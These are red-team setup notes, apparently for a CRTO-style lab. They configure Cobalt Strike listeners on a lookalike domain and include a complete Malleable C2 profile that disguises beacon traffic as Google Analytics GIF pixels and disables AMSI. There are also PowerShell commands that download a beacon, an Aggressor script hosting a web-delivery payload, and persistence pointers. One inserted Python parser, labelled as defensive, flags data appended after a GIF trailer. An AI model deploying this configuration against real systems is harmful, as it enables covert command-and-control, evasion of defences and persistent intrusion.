Prepare Setup

Follow Payload files

Create Listeners

HTTP

SMB

  • Name: smb
  • Payload: Beacon SMB
  • Pipename: TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41335

TCP

  • Name: tcp
  • Payload: Beacon TCP
  • Port: 8080
  • Bind to localhost: False

TCP (local)

  • Name: tcp-local
  • Payload: Beacon TCP
  • Port: 8443
  • Bind to localhost: True

DNS

  • Name: dns
  • Payload: Beacon DNS
  • Host: cdn.bleepincomputer.com
  • Stager: cdn.bleepincomputer.com

Not needed: run a python3 web server

python3 -m http.server

Not needed: check outbound access to the TeamServer

iwr -Uri http://bleepincomputer.com/a
iwr -Uri http://bleepincomputer.com/a -OutFile beacon.ps1

Change the beacon templates (follow payload_files).

In Cobalt Strike, load:
C:\Tools\cobaltstrike\custom-artifacts\mailslot\artifact.cna
C:\Tools\cobaltstrike\custom-resources\resources.cna
C:\Tools\SCShell\CS-BOF\scshell.cna

SSH to the teamserver (password: Passw0rd!)

ssh attacker@10.0.0.5

Change the profile (example below):

nano /opt/cobaltstrike/profiles/default.profile
sudo /usr/bin/docker restart cobaltstrike-cs-1

Custom Malleable C2 Profile for CRTO

# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker

set sleeptime "5000";
set jitter "20";

http-get {
    set uri "/__utm.gif";

    client {
        parameter "utmac" "UA-2202604-2";
        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        metadata {
            netbios;
            prepend "__utma";
            parameter "utmcc";
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            # hexdump pixel.gif
            # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
            # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
            # 0000020 01 00 01 00 00 02 01 44 00 3b

            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";

            print;
        }
    }
}

http-post {
    set uri "/___utm.gif";

    client {
        header "Content-Type" "application/octet-stream";

        id {
            prepend "UA-220";
            append "-2";
            parameter "utmac";
        }

        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        output {
            print;
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

# dress up the staging process too
http-stager {
    server {
        header "Content-Type" "image/gif";
    }
}

stage {
    set userwx "false";
    set module_x64 "Hydrogen.dll"; # use a different module if you like
    set copy_pe_header "false";
}

post-ex {
    set amsi_disable "true";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe";
    set obfuscate "true";
    set cleanup "true";
    set smartinject "true";
    set pipename "TSVCPIPE-########-####-####-####-############";

    transform-x64 {
        strrep "ReflectiveLoader" "NetlogonMain";
        strrepex "ExecuteAssembly" "Invoke_3 on EntryPoint failed." "Assembly threw an exception";
        strrepex "PowerPick" "PowerShellRunner" "PowerShellEngine";

        # add any other transforms that you want
    }
}

process-inject {
    execute {
        NtQueueApcThread-s;
        NtQueueApcThread;
        SetThreadContext;
        CreateThread;
    }
}
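Defender-side example added here (not code from this page, the CRTO course, or the profile's author): a parser that walks the GIF block structure of a response served as image/gif and reports how many bytes follow the GIF trailer (0x3B), which is where the profile's output block places its data after the prepended pixel. The 42-byte pixel is taken from the hexdump comment above; the 64 appended bytes are constructed and stand in for whatever print emits.

```python
import struct

# Constructed from the hexdump comment in the profile above: the 42-byte 1x1 pixel.gif.
PIXEL_GIF = bytes.fromhex(
    "47494638396101000100800000000000"
    "ffffff21f90401000000002c00000000"
    "0100010000020144003b"
)
# Constructed sample body: the same pixel with 64 opaque bytes appended after the trailer,
# the shape the profile's "prepend ... print" output block produces.
APPENDED_BODY = PIXEL_GIF + bytes(range(64))


def parse_gif(body: bytes) -> dict:
    """Walk the GIF block structure; report where the image ends and how many bytes trail it."""
    if len(body) < 13 or body[:6] not in (b"GIF87a", b"GIF89a"):
        return {"valid": False, "reason": "no GIF signature"}
    width, height, packed = struct.unpack("<HHB", body[6:11])
    pos = 13
    if packed & 0x80:  # global colour table: 3 bytes per entry, 2^(n+1) entries
        pos += 3 * (2 << (packed & 0x07))
    while pos < len(body):
        tag = body[pos]
        if tag == 0x3B:  # trailer: anything after this byte is not part of the image
            return {"valid": True, "width": width, "height": height,
                    "trailing_bytes": len(body) - pos - 1}
        if tag == 0x21:  # extension introducer + label, then data sub-blocks
            pos += 2
        elif tag == 0x2C:  # image descriptor (10 bytes), optional local colour table, LZW size
            if pos + 10 > len(body):
                return {"valid": False, "reason": "truncated image descriptor"}
            local = body[pos + 9]
            pos += 10 + (3 * (2 << (local & 0x07)) if local & 0x80 else 0) + 1
        else:
            return {"valid": False, "reason": f"unexpected block 0x{tag:02x} at {pos}"}
        while pos < len(body) and body[pos] != 0:  # length-prefixed sub-blocks until 0x00
            pos += 1 + body[pos]
        pos += 1  # skip the block terminator
    return {"valid": False, "reason": "no trailer"}


def verdict(content_type: str, body: bytes) -> str:
    """Triage one HTTP response: a well-formed GIF with bytes past its trailer is the signal."""
    if not content_type.lower().startswith("image/gif"):
        return "not-gif"
    info = parse_gif(body)
    if not info["valid"]:
        return "malformed-gif: " + info["reason"]
    if info["trailing_bytes"]:
        return f"suspicious: {info['trailing_bytes']} bytes after GIF trailer"
    return "clean"
```

Real tracking pixels end at the trailer, so bytes after it on a 1x1 image are worth a closer look; the check is a heuristic for triage, not a signature.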

Generate all payloads: use Payloads > Windows Stageless Generate All Payloads to replace all of your payloads in C:\Payloads

Keep but likely not needed

Enable hosting of Web Delivery payloads via the agscript client in headless mode

cat host_payloads.cna

# Connected and ready
on ready {

    # Generate payload
    $payload = artifact_payload("http", "powershell", "x64");

    # Host payload
    site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}

Add the command below to the /etc/systemd/system/teamserver.service file:

ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'

Persistent Aggressor script: copy the aggressor script (.cna) code and paste it on the Attacker machine, then copy sharpersist.exe from the Attacker machine's Tools folder into the same directory as the persistence .cna file. https://github.com/Peco602/cobaltstrike-aggressor-scripts/tree/main/persistence-sharpersist